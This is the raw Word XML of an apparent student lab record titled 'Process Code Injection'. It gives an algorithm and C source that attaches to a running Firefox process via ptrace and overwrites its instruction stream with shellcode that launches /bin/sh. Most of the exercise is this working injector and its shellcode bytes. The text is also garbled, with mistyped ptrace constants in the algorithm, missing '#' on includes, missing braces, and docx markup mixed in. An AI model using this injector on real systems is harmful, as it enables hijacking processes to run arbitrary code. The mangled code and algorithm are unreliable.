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Ex. No.:5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Date: 23/03/2024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PROCESS CODE INJECTION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do process code injection of firefox to use trace system call.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Algorithm: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Find out the pid of the running firefox program.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Check the Code Injection file.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Get the pid of the firefox from the Command Line Argument.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Allocate memory buffers for the shell.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Attach to the victim process with PTRACE_ATTACK.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Get the Register values of the attached process.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Use PRAISE_PURETEXT to InstallShell.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Detach from the victim process using PTRACE_DETACH.</w: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  <w:t>Code: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//Process Code Injection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 &lt;stdio.h&gt;//C standard input output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include &lt;stdlib.h&gt;//C Standard General Utilities Library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include &lt;string.h&gt;//C string lib header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include &lt;unistd.h&gt;//standard symbolic constants and types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include &lt;sys/wait.h&gt;//declarations for waiting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include &lt;sys/ptrace.h&gt;//gives access to ptrace functionality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include &lt;sys/user.h&gt;//gives ref to regs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//The shellcode that calls /bin/sh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char shellcode[]={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"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97"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"\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"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};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//header for our program.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header()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printf("----Memory bytecode injector-----\n");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//main program notice we take command line options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main(int argc,char**argv)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int i,size,pid=0;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struct user_regs_struct reg;//struct that gives access to registers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//note that this regs will be in x64 for me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//unless your using 32bit then eip,eax,edx etc...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char*buff;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header();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//we get the command line options and assign them appropriately!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pid=atoi(argv[1]);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size=sizeof(shellcode);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//allocate a char size memory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buff=(char*)malloc(size);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//fill the buff memory with 0s upto size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memset(buff,0x0,size);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//copy shellcode from source to destination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memcpy(buff,shellcode,sizeof(shellcode));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//attach process of pid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ptrace(PTRACE_ATTACH,pid,0,0);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//wait for child to change state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wait((int*)0); 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//get process pid registers i.e Copy the process pid's general-purpose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//or floating-point registers,respectively,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//to the address reg in the tracer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ptrace(PTRACE_GETREGS,pid,0,&amp;reg);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printf("Writing EIP 0x%x, process %d\n",reg.rip,pid);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//Copy the word data to the address buff in the process's memory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for(i=0;i&lt;size;i++){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ptrace(PTRACE_POKETEXT,pid,reg.rip+i,*(int*)(buff+i));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//detach from the process and free buff memory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ptrace(PTRACE_DETACH,pid,0,0);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free(buff);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return 0;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  <w:t>Output:</w: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  <w:t>Terminal 1:</w:t>
      </w:r>
    </w:p>
    <w:p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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4610100" cy="806450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62186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60039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  <w:t>Terminal 2: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3194050" cy="844550"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1263307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07485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>
      <w:pPr>
        <w:ind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Hence, Process Code Injection has been implemented successfully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E0E9EF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F2E0E9E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33"/>
    <w:rsid w:val="00041AD1"/>
    <w:rsid w:val="001C3E63"/>
    <w:rsid w:val="001C65E2"/>
    <w:rsid w:val="003B0379"/>
    <w:rsid w:val="003E0A73"/>
    <w:rsid w:val="003E4833"/>
    <w:rsid w:val="00463FFD"/>
    <w:rsid w:val="006B4B54"/>
    <w:rsid w:val="006C702F"/>
    <w:rsid w:val="007042F5"/>
    <w:rsid w:val="00D84F11"/>
    <w:rsid w:val="00F14593"/>
    <w:rsid w:val="37FF3979"/>
    <w:rsid w:val="3E061470"/>
    <w:rsid w:val="5F3439F6"/>
    <w:rsid w:val="67BA2BEE"/>
    <w:rsid w:val="6A41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IN" w:eastAsia="en-US" w:bidi="th-TH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309</Words>
  <Characters>1762</Characters>
  <Lines>14</Lines>
  <Paragraphs>4</Paragraphs>
  <TotalTime>3</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2067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2024-05-08T07:56:00Z</dcterms:created>
  <dc:creator>Jeffrey Jesu</dc:creator>
  <cp:lastModifiedBy>Kavin Manoharan</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-18T12:40:46Z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69A448BA9DB7491CA9BE6BEAEE59BC18_13</vt:lpwstr>
  </property>
</Properties>
</file>